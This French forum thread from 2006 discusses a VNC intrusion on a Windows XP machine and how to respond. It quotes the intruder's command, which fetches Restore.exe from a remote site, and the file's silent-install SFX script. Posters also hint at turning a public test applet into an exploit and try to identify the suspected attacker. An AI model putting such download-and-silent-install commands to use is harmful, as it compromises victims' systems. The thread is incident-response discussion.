Intrusion (via VNC ?)

Intrusion (via VNC ?) - Sécurité - Windows & Software

Marsh Posté le 02-06-2006 à 08:57:03    

Bonjour,
 
<my_life>Hier soir, avant d'aller me doucher, je me tourne vers mon écran machinalement.</my_life>
Et là, c'est le drame : le pointeur de la souris commence à bouger tout seul, lance la fenêtre executer, et commence a taper dedans.
 
Après une rapide pollution de mon caleçon, je retrouve un début de sang froid et je coupe le VNC server qui tourne sur mon poste (Windows XP sp2 + correctifs + Avast à jour). Pour être sûr d'ailleurs, je coupe aussi le reste (je ne parle pas de mon prépuce mes des programmes et services qui tournaient).
 
Voilà ce que j'ai pu tirer comme info. La personne sympatique et bien intentionnée à voulu lancer le téléchargement d'un fichier Restore.exe (la commande du exécuter était iexplore http://ircss.free.fr/Restore.exe). Je suis allé voir sur le site en question -en construction- et j'ai téléchargé le fichier.
 
C'est apparament un auto-extractible SFX, avec les lignes suivantes dans les commentaires :
 

Citation :


Le commentaire ci-dessous contient des commandes pour script SFX
 
Path=C:\WINDOWS\system32\Restore\
SavePath
Setup=C:\WINDOWS\system32\Restore\6.4.2600.0\Restore.exe
Silent=1
Overwrite=1


 
Inutile de préciser que je n'ai pas eu assez d'attributs masculins (ou d'inconscience) pour l'executer.
 
Les questions :
 
- sachant que la machine est derrière un routeur, que les seuls ports redirigés vers cette dernière sont les ports MSN, quelques ports p2p (pas ceux par défaut) et le port VNC (5900, pourquoi j'ai laissé le port par défaut !?!), est ce que je peux logiquement penser à une attaque sur mon VNC, ou plutôt une backdoor lambda (apparament, le controle distant c'est arreté après coupure de VNC - apparament),
 
- j'ai cherché un fichier de log VNC server, pas trouvé (il existe ?),
 
- y'a-t-il un gros risque que même après avoir changé de port et de mot de passe VNC, le joyeux plaisantin connaissant mon IP (fixe) recommence ses blagounettes de la même manière (snif les ports ouverts...),
 
- je flipe pour les autres services qui tournent, genre au hasard mon serveur (http / ftp / ssh).
 
Merci de m'avoir lu jusqu'au bout. Vos avis ?
 

Reply

Marsh Posté le 02-06-2006 à 08:57:03   

Reply

Marsh Posté le 02-06-2006 à 10:05:01    

1) soit tu l'a chopé au tout début de son attaque, sachant qu'il connaissait donc ton mot de passe, et a a ta place c'est la dessu que je me poserait des questions, mais quoi qu'il en soit il n'a pas eu le temps de toucher grand chose a ta machine,
 
2) Soit ce type est un gros naze, parce que si ca fait X jours qu'il a acces a ta machine, ca fait tres longtemps qu'il aurait "du" installer un trojan correct, ce qui lui aurait ensuite permi de prendre le control de ta machine n'importe quand sans que tu puisse jamais le remarquer.
 
Donc dans les 2 cas (soit il mauvais, soit il a pas eu le temps) je suppose qu'il a rien fait sur ta machine. Donc changement de TOUS les mots de passe, changement des ports des services (meme si ca sert pas a grand chose), verification des regles sur le routeur, mise a jour de l'os bien sur, et surveillance accru des conexions pendants quelques jours.  
 
Voila...
 
EDIT : et verifie aussi qu'il a rien lancé d'autres, genre service telnet etc, plus jette un coup d'oeil a tout ce qui
a été uploadé recement... Bref, un passage à l'anti virus/trojan de toute ta machine est indispensable dans tous les cas.


Message édité par Alana le 02-06-2006 à 10:07:19
Reply

Marsh Posté le 02-06-2006 à 10:46:44    

Effectivement, j'allais plutôt dans cette direction.
 
Mais ce qui m'inquiète, c'est que le mot de passe utilisé était un mot de passe fort (majuscules / minuscules / chiffres, aucun sens, 8 caractères). Si il a pu le trouver une fois (pas pu le trouver quelque part), il pourra le refaire. Je connais pas les méthodes de hack sur VNC, mais si il a brute force mon poste, bin il a du y passer un certain temps.
 
Bref, je suis passablement inquiet.

Reply

Marsh Posté le 02-06-2006 à 10:57:41    

8 caracteres, je dirai que c'est encore limite... moi je suis au dessus de 10 pour tous mes mots de passe. Mais je comprend que tu sois inquiet, c'est curieux quand meme.
 
As tu d'autres machines en lan ? une autre machine a t-elle pu etre compromise ? le mot de passe a t-il pu etre snifé sur le reseau ?

Reply

Marsh Posté le 02-06-2006 à 11:13:05    

Pour le snif du pass, je suis quasiment sûr que non : je ne me connecte que rarement à mon poste via VNC.
 
J'ai un serveur sur ce même réseau, et oui, je suis plutôt inquiet. C'est une Debian à jour, mais c'est plutôt les services qui tournent dessus qui me font craindre (apache php mysql ftp ssh et j'en oublie peut être).
 
Aujourd'hui, j'ai pas allumé un seul poste, le temps de voir tout ça.
 
En fait, je postait surtout pour savoir si d'autres avaient eu ce soucis, notament avec un téléchargement sur le site http://ircss.free.fr/ et de ce fameux fichier Restore.exe.
 
Des infos sur ça m'intéresseraient grandement.
 
(pas de log sur VNC server alors ?  :ange: )
 
Merci de tes réponses en tout cas.

Reply

Marsh Posté le 02-06-2006 à 11:25:21    

pour moi c'est une preuve suplementaire que tu as pas affaire a quelqu'un qui s'y connait... Mais clairement vu le script (et le silent=1) c'etait pas bon pour toi.  
 
Je suis alle voir sur le site, on dirait que c'est lié a mIrc... utilise tu ce soft  ? (qui est une vraie cochonerie, on ne compte plus le nombre de saloperie qui se sont balladé grace a aux possibiltés de scripting de mirc). Autre chose, il faudrait vérifier comment vnc stocke son mot de passe... Si tu dis qu'il n'a pas pu le trouver ou le deviner, alors on peut suppose qu'il l'a peut etre directement recuperé et decrypté.
 
Quand a la machine debian, fouille dans les logs, la au moins tu dois en avoir pas mal, verifie les fichiers (tri par date etc) pour voir si rien n'a été ajouté recement etc. Le support des modules dans les noyau est il present ? dans tous les cas, une petite detection de root kit peut etre la bienvenu, je crois qu'il existe des softs pour ca.

Reply

Marsh Posté le 02-06-2006 à 11:29:21    

Tu as quelle version de VNC ?
 
Sur un récent topic, un gars a eu le même problème. Il avait une version avec faille corrigée depuis.

Reply

Marsh Posté le 02-06-2006 à 11:29:52    

Pour mon poste sous windause, j'utilise pas de soft liés à IRC. Je cherche en ce moment des infos sur le site pour avoir une idée de la teneur de l'exe-cadeau.
 
Pour ce qui est de mon serveur, il est éteind et je suis au taff, donc l'analyse des logs attendra !
 
Je retourne à la peche aux infos !
 
Edit : même réponse pour ma version de VNC, je suis au taff et j'ai pas accès à l'info. Je reposterais de chez moi, mais je suis très intéressé par un lien vers le topic en question !


Message édité par LeRiton le 02-06-2006 à 11:31:52
Reply

Marsh Posté le 02-06-2006 à 11:38:43    

Sinon, je viens de tilter quelque chose.
 
En visitant un peu http://ircss.free.fr/ je me dit que le gars est hébergé chez free et développe une maquette pour un site qui aura un nom de domaine différent. J'extrapole sur le fait que mon hacker est le proprio du domaine ircss.free.fr (du compte quoi, je sais, j'extrapole beaucoup). Je suis chez Free, je comptais déja envoyer un mail concernant le problème. Du même coup, je vais quand même préciser que l'URL du site sur lequel il s'appuit (le sien) est de chez eux.
 
Y'a pas un fou pour tester le fichier en question, qu'on en connaisse l'effet / contenu ?  :D  

Reply

Marsh Posté le 02-06-2006 à 11:41:42    

un fou non, par contre quelqu'un qui aurait un peu de temps pour lancer ce truc dans une machine vmware avec silent=0 ca pourait etre interessant...
 
PS : en continuant a extrapoler, ca pourait valoir le coup de verifier l'existence d'une adresse comme ircss@free.fr


Message édité par Alana le 02-06-2006 à 11:43:52
Reply

Marsh Posté le 02-06-2006 à 11:41:42   

Reply

Marsh Posté le 02-06-2006 à 11:44:15    

Reply

Marsh Posté le 02-06-2006 à 11:50:23    

Le fichier n'est plus disponible à l'adresse indiquée, ce qui me laisse encore a penser que mon hacker est le proprio du site.
 
Je met à disposition le fichier ce soir pour les éventuels personnes compétentes pour l'analyse.
 
Merci pour le lien ! Je serais "rassuré" si la faille de mon système était corrigée, je pensais que l'ensemble était plutôt secure.
 
Pour ce qui est de l'adresse free, elle existe forcément puisque le domaine est là (je m'avance peut être, mais il me semble que c'est en créant un compte et en activant les pages web, donc forcément mail associé).

Reply

Marsh Posté le 02-06-2006 à 11:55:24    

Le fichier est toujours à l'adresse donnée sauf que c'est restore.exe avec un "r" minuscule.
 
Après j'y connais rien en IRC. Rien de rien.
Mais j'imagine que cela t'installait un client avec possibilité de l'exploiter à distance. Comment en se jouant du routage ? Je n'en sais rien. Le "pirate" peut-être non plus ...
 
Checke déjà ta version de VNC.
Mets à jour si besoin et change le port par défaut. Voir utilise un autre soft de contrôle (radmin, bureau à distance, ...)

Message cité 1 fois
Message édité par ShonGail le 02-06-2006 à 11:55:52
Reply

Marsh Posté le 02-06-2006 à 11:56:41    

en tout cas ca fait longtemps que j'avais remplace realvnc par tightvnc... plus secure et infiniment plus economique en bande passante...

Reply

Marsh Posté le 02-06-2006 à 12:01:46    

En tout cas, en regardant cette archive quelques minutes, on tombe sur des .ini qui contiennent des infos. Notamment une IP.
 
Peut-être celle à laquelle le client devait se connecter (ce qui résout le prob du routage)
 
Mais faudrait quelqu'un qui s'y connait en IRC pour corroborer ...

Reply

Marsh Posté le 02-06-2006 à 12:05:21    

ShonGail a écrit :

Le fichier est toujours à l'adresse donnée sauf que c'est restore.exe avec un "r" minuscule.


 
 
Donc il l'a renomé. C'était majuscule hier.
 
Pour vos conseil quand au choix de mon soft de déport, merci, j'en prend bonne note.

Reply

Marsh Posté le 02-06-2006 à 12:44:10    

on avance :
 
You are not permitted to download the file "restore.exe" because it is infected with the virus "Misc/Motherboardmonitor".
 
C'est ca :
 
http://72.14.221.104/search?q=cach [...] =firefox-a
 
Analyse en cours... :D

Message cité 1 fois
Message édité par Alana le 02-06-2006 à 12:49:35
Reply

Marsh Posté le 02-06-2006 à 12:53:25    

La question que je me pose c'est comment il a trouvé son pass VNC ? [:noxauror]

Reply

Marsh Posté le 02-06-2006 à 12:56:53    

Lis mon 1er post et tu trouveras une réponse probable

Reply

Marsh Posté le 02-06-2006 à 12:59:56    

on saura ce soir si Riton utilisait bien realvnc 4.1.1 (ou plus ancien ?) ce qui signifierait que le petit rigolo qui a foiré son coup à pas eu besoin de trouver le mot de passe.  
 
Ce que je comprend vraiment pas c'est... qu'est ce qu'il voulait faire avec un plugin a mirc sur une machine ou mirc est meme pas installé... moi toute cette histoire me fait la meme impression que quand je lis mes logs apache et que je vois toutes ces attaques "windows" sur ma debian...  Bref, je dirai qu'il a eu un gros coup de bol pour vnc, et qu'a coté de ca il savait pas du tout ce qu'il faisait.
 
Evidement dans le doute il faut continuer a chercher et a comprendre, c'est ca qu'est malheureux, c'est que meme si on a affaire au pire des plus mauvais script kiddie, il faut quand meme tout vérifier.

Reply

Marsh Posté le 02-06-2006 à 13:00:39    

Alana a écrit :

on avance :
 
You are not permitted to download the file "restore.exe" because it is infected with the virus "Misc/Motherboardmonitor".
 
C'est ca :
 
http://72.14.221.104/search?q=cach [...] =firefox-a
 
Analyse en cours... :D


 
 
Ce n'est pas un virus. D'ailleurs la corporate de symantec ne m'a rien notifié à l'analyse.
 
C'est une information en rapport avec la présence d'une DLL de mirc. Ce dernier pouvant servir à des actions malhonnêtes.

Reply

Marsh Posté le 02-06-2006 à 13:00:44    

[:romf]
 
Mais ça fait longtemps qu'elle est corrigée cette faille , non ?

Reply

Marsh Posté le 02-06-2006 à 13:08:01    

Alana a écrit :

on saura ce soir si Riton utilisait bien realvnc 4.1.1 (ou plus ancien ?) ce qui signifierait que le petit rigolo qui a foiré son coup à pas eu besoin de trouver le mot de passe.  
 
Ce que je comprend vraiment pas c'est... qu'est ce qu'il voulait faire avec un plugin a mirc sur une machine ou mirc est meme pas installé... moi toute cette histoire me fait la meme impression que quand je lis mes logs apache et que je vois toutes ces attaques "windows" sur ma debian...  Bref, je dirai qu'il a eu un gros coup de bol pour vnc, et qu'a coté de ca il savait pas du tout ce qu'il faisait.
 
Evidement dans le doute il faut continuer a chercher et a comprendre, c'est ca qu'est malheureux, c'est que meme si on a affaire au pire des plus mauvais script kiddie, il faut quand meme tout vérifier.


 
C'est exactement ce que je me dit. J'imagine plutôt un gus qui tablait sur la faille de sécurité de VNC et qui cherchait une machine vulnérable en priant qu'il y aurai ce qu'il faut derrière pour continuer.
 
Merci à tous pour vos réponses, promis plus de détails ce soir !
 
Edit : j'ai mailé Free également, sans trop d'espoirs.
Re-Edit :

Tuxerman12 a écrit :

[:romf]
 
Mais ça fait longtemps qu'elle est corrigée cette faille , non ?


Oué, mais ça fait longtemps que j'ai pas mis à jour mon VNC  :D  (je le supposait stable)


Message édité par LeRiton le 02-06-2006 à 13:27:13
Reply

Marsh Posté le 02-06-2006 à 13:18:46    

Heu... non ca fait pas longtemps du tout hein....
 
http://www.frsirt.com/bulletins/5146
 
Voir aussi le site de realvnc dans les release notes, la correction date du 12 mai donc bon.
Par contre, je me demande a quelle ml il était aboné pour avoir pu chopé un exploit aussi vite... puisque clairement, il a pas du le coder lui meme :D
 
Edit : a ta place c'est surtout a lui pour commencer que j'aurai envoyé un mail...

Message cité 1 fois
Message édité par Alana le 02-06-2006 à 13:19:26
Reply

Marsh Posté le 02-06-2006 à 13:22:20    

Arfffffff , y avait une autre faille alors , celle dont j' ai lu l'existance a été patchée il y a plus d' un an :D

Reply

Marsh Posté le 02-06-2006 à 13:52:22    

Alana a écrit :

Edit : a ta place c'est surtout a lui pour commencer que j'aurai envoyé un mail...


 
J'y ai bien pensé, mais pour lui dire quoi ? c'est pas bien ? L'insulter ? Je pense qu'au final, ça va plus lui donner envie de s'acharner sur moi qu'autre chose, non ?

Reply

Marsh Posté le 02-06-2006 à 13:58:33    

moi je lui dirai rien, je mettrai juste l'url de ce thread.
Si il est pas stupide, il comprendra vite qu'il a interet à vite se calmer,
et a sa place je t'enverai un pm pour m'excuser, te dire que c'etait comme ca pour rigoler, et que non les autres machines n'ont rien.
 
Bien sur il peut aussi la jouer "ca alors, mon site a été hacké" mais la ca va etre plus chaud, parce que tu peux lui demander de porter plainte (et de prouver qu'il l'a fait) etc.
 
"s'acharner" sur toi ? C'est pas parce que tu utilisai une version bugué d'un soft que tes machines lui appartienent, encore une fois
on peut etre quasiement sur qu'au contraire il ne maitrisai pas grand chose. (et faut etre gonflé quand meme pour utiliser
vnc, un truc aussi visible, ou alors on le fait quand on est certain que la personne dort ou qu'elle est pas chez elle, et encore)
Bref, il est pas doué, c'est un fait acquis. Tu n'a rien a craindre de lui, c'est la seule chose dont je sois a peu pres certain.
 
En y repensant pour le coup de l'exploit, une applet java était dispo sur l'un des sites pour faire des tests,
il suffisait de telecharger le prog, de décompiler (c'est pas les outils qui manque) virer le test de l'ip et hop
c'etait réglé, on avait un exploit tout près. Je pense que meme moi j'aurai pu le faire :) Bref, je suppose que ce
truc circule plus ou moins largement, donc c'est pas forcement ettonant qu'il soit tombé dessu.

Message cité 1 fois
Message édité par Alana le 02-06-2006 à 14:04:06
Reply

Marsh Posté le 02-06-2006 à 14:05:48    

Tu habites aux alentours de cachan ?
 
Parce que l'IP contenue dans le .ini est relative au répartiteur cac94

Reply

Marsh Posté le 02-06-2006 à 14:14:05    

Alana a écrit :

"s'acharner" sur toi ? C'est pas parce que tu utilisai une version bugué d'un soft que tes machines lui appartienent, encore une fois
on peut etre quasiement sur qu'au contraire il ne maitrisai pas grand chose. (et faut etre gonflé quand meme pour utiliser
vnc, un truc aussi visible, ou alors on le fait quand on est certain que la personne dort ou qu'elle est pas chez elle, et encore)
Bref, il est pas doué, c'est un fait acquis. Tu n'a rien a craindre de lui, c'est la seule chose dont je sois a peu pres certain.


 
On est d'accord, c'est ce que je pense égallement, mais du même coup, plus trop d'intéret de lui envoyer de mail. Lui mettre le nez dans son caca ?
 

ShonGail a écrit :

Tu habites aux alentours de cachan ?
 
Parce que l'IP contenue dans le .ini est relative au répartiteur cac94


 
Nop, pas du tout dans le coin !
 
Juste pour clore le sujet pour cette après midi (!) avant d'être sûr qu'il s'y est bien pris comme ça, je vais vérifier la version de VNC. Si il n'est pas passé par cette faille (j'en doute de plus en plus)  :sweat:  
 

Reply

Marsh Posté le 02-06-2006 à 14:16:35    

Si tu as son mail, son site, son IP et donc son FAI et sa localisation,
 
c'est pas le pirate de l'année et tu peux le prévenir qu'il a commis un délit et que tu attends des excuses.

Reply

Marsh Posté le 02-06-2006 à 14:19:11    

Citation :


Lui mettre le nez dans son caca ?  


Ouai :D  
Au moins ca peut lui supprimer l'envi de recomencer ailleur.
Bon, en meme temps, il faut reconaitre que c'est grace a lui qu'on est au moins quelque uns a avoir appris l'existence de cette faille :)
Meme si clairement il s'appretait a faire des trucs pas cool deriere.
 
Perso un coup comme ca avec vnc, j'aurai lance cmd et j'aurais ecrit "bonjour. Y a quelqu'un ?" :D
lancez l'installation d'une merde, ca c'etait carrement une declaration de guerre.

Message cité 1 fois
Message édité par Alana le 02-06-2006 à 14:19:29
Reply

Marsh Posté le 02-06-2006 à 14:26:19    

ShonGail a écrit :

Si tu as son mail, son site, son IP et donc son FAI et sa localisation,


 
Bin en fait, le mail et le site, j'ai rien qui me dit qu'il en est le proprio (forte suscpition - l'orthographe ?). Son IP je l'ai pas pour le moment, je cherchai des logs VNC (apparament dans le journal d'évenement, je regarde ce soir).
 
Donc j'ai pas granbd chose pour le moment  :D  
 

Alana a écrit :

Perso un coup comme ca avec vnc, j'aurai lance cmd et j'aurais ecrit "bonjour. Y a quelqu'un ?" :D
lancez l'installation d'une merde, ca c'etait carrement une declaration de guerre.


 
Le téléchargement [:cbrs] Il a pas eu le temps de faire plus. Coup de bol magique de passer devant l'écran à ce moment.

Reply

Marsh Posté le 02-06-2006 à 14:46:44    

Hahaha !
 
http://ircss.free.fr/v1/
 
Avec le profil du webmaster en prime !
Bon, rien ne dit que ça vienne de lui, faudrai en savoir plus sur le script...

Reply

Marsh Posté le 02-06-2006 à 14:50:50    

Y a pu rien  :heink: , il lit HFR ? :D

Reply

Marsh Posté le 02-06-2006 à 14:51:33    

marche plus... y avait quoi ?
edit : grilled et je me pose la meme question :)


Message édité par Alana le 02-06-2006 à 14:51:52
Reply

Marsh Posté le 02-06-2006 à 14:54:52    

C'est revenu :o

Reply

Marsh Posté le 02-06-2006 à 15:01:13    

Bon, bin oué, il doit lire HFR  :D  :sweat:  
 
En gros, la maquette de ce que l'on voit sur les screenshot de la page d'acceuil. Aucune page remplie, si ce n'est la page des membres, avec un profil : le sien  :D  
 

Citation :

1 10/08/2005 Webmaster Mengde  
Profil de Mengde  
Date d'inscription: 10/08/2005  
E-mail: xxxxxxx@hotmail.com


 
Je suis gentil, je masque son MSN.

Reply

Marsh Posté le 02-06-2006 à 15:02:38    

Il a ptet un compte MSN , passe lui dire bonjour :)

Reply

Marsh Posté le 02-06-2006 à 15:06:22    

C'est prévu  :D  
 
C'est dingue ce qu'on trouve sur le net avec un simple pseudo...

Reply

Marsh Posté le 02-06-2006 à 15:07:01    

Mouhahahahahahahhahaa trop fort :)
et effectivement c'est revenu. Tu viens de le ridiculiser mechament la.
En meme temps, c'est tellement enorme qu'on peut se demander si ce compte free a pas été hacké quand meme mais bon...
LOL.

Reply

Marsh Posté le    

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed